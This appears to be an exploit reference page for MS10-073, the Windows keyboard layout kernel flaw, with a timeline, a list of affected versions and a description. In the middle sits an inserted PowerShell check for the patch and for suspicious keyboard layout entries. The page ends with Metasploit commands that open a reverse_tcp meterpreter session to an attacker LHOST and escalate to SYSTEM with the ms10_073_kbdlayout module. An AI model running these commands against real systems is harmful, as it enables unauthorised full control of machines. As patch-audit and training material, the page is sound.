MS10-073 : Microsoft Windows Keyboard Layout Privilege Escalation

Timeline :

Vulnerability disclosed by Microsoft on 2010-10-12
Microsoft patch "KB981957" provided on 2010-10-12
Exploit-DB PoC provided by Ruben Santamarta on 2011-01-13
Metasploit PoC provided by jduck on 2011-01-17

PoC provided by :

Ruben Santamarta
jduck

Reference(s) :

CVE-2010-2743
MS10-073

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 Edition SP1 and Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems

Tested on Windows XP SP3

Description :

This module exploits the keyboard layout 0-day used by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. By loading such a crafted keyboard layout, an attacker who already has local code execution can run code in Ring 0 and escalate to SYSTEM.
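As an added defensive check (not part of the original page or of the Metasploit module), the following PowerShell script does the two things an administrator would want to verify on one of the affected systems listed above: whether the KB981957 patch from the timeline is installed, and whether every keyboard layout registered under the standard "Keyboard Layouts" registry key still points at a layout DLL inside System32, since the attack depends on the kernel loading a crafted layout DLL. It assumes an elevated PowerShell session (PowerShell 2.0 or later, which is not installed by default on Windows XP), the KB number from this page, and the standard location of the registry key; the function names are my own.

```powershell
# Added defensive check, not part of the original page or the Metasploit module.
# Assumptions: elevated PowerShell 2.0+ session on one of the affected Windows versions;
# KB981957 is the patch named on the page; each subkey of the Keyboard Layouts key
# carries a "Layout File" string value naming a DLL expected to live in System32.

function Test-MS10073Patch {
    # Get-HotFix reads Win32_QuickFixEngineering; a missing entry on an affected OS
    # means the host is still exposed to CVE-2010-2743 (see caveat in the note below).
    $fix = Get-HotFix -Id 'KB981957' -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        Patch       = 'KB981957'
        Installed   = [bool]$fix
        InstalledOn = if ($fix) { $fix.InstalledOn } else { $null }
    }
}

function Get-SuspiciousKeyboardLayout {
    # Every registered layout should resolve to an existing DLL under System32.
    # A layout file that is missing there, or that resolves somewhere else, is worth
    # a closer look, because the kernel loads whatever layout DLL is registered.
    $key   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Keyboard Layouts'
    $sys32 = Join-Path $env:SystemRoot 'System32'

    Get-ChildItem $key | ForEach-Object {
        $file = (Get-ItemProperty $_.PSPath).'Layout File'
        if (-not $file) { return }   # some subkeys carry no layout file; skip them

        # Relative names are looked up in System32; absolute paths are taken as given.
        $resolved = if ([IO.Path]::IsPathRooted($file)) { $file } else { Join-Path $sys32 $file }

        [PSCustomObject]@{
            LayoutId   = $_.PSChildName
            LayoutFile = $file
            Resolved   = $resolved
            InSystem32 = $resolved.StartsWith($sys32, [StringComparison]::OrdinalIgnoreCase)
            Exists     = Test-Path $resolved
        }
    } | Where-Object { -not $_.InSystem32 -or -not $_.Exists }
}

# Report: patch status first, then any layout entries that fail the checks.
Test-MS10073Patch | Format-List
Get-SuspiciousKeyboardLayout | Format-Table -AutoSize
```

Two caveats when reading the output. Get-HotFix only lists updates recorded by the servicing stack, so a missing KB981957 entry is a strong signal but not proof on its own; cross-check the file version of the affected kernel binaries against the bulletin if the result is unexpected. An empty table from Get-SuspiciousKeyboardLayout means the registered layouts look normal; it does not prove that no crafted layout was ever loaded, since the Metasploit module loads its layout at run time rather than registering it permanently, so this audit is a hygiene check to pair with the patch status, not a substitute for it.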

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
ifconfig
set LHOST 192.168.178.21
exploit -j

sessions
sessions -i 1
getuid
getsystem
ps
migrate xxxx
background

use post/windows/escalate/ms10_073_kbdlayout
info
show options
set SESSION 1
exploit

sessions -i 1
getuid
getsystem
shell